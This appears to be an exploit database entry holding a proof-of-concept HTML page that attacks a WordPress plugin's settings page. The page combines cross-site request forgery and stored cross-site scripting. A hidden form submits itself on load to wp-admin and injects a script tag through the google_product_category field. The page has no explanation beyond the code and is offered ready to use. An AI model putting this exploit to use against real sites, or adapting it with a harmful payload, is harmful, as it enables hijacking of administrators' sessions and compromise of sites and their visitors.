Share
## https://sploitus.com/exploit?id=WPEX-ID:399FFD65-F3C0-4FBE-A83A-2A620976AAD2
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=fca_pc_settings_page" id="hack" method="post">
      <input type="hidden" name="fca_pc[has_save]" value="1" />
      <input type="hidden" name="fca_pc_save" value="1" />
      <input type="hidden" name="fca[trigger_type]" value="post" />
      <input type="hidden" name="fca_pc[event_name]" value="" />
      <input type="hidden" name="fca_pc[value]" value="" />
      <input type="hidden" name="fca_pc[currency]" value="" />
      <input type="hidden" name="fca_pc[content_name]" value="" />
      <input type="hidden" name="fca_pc[content_type]" value="product" />
      <input type="hidden" name="fca_pc[content_ids]" value="" />
      <input type="hidden" name="fca_pc[content_category]" value="" />
      <input type="hidden" name="fca_pc[search_string]" value="" />
      <input type="hidden" name="fca_pc[num_items]" value="" />
      <input type="hidden" name="fca_pc[status]" value="" />
      <input type="hidden" name="fca_pc[google_product_category]" value="'><script>alert(document.domain);</script>" />
      <input type="submit" value="submit request" />
    </form>
  </body>
  <script>
      var form1 = document.getElementById('hack');
      form1.submit();
  </script>
</html>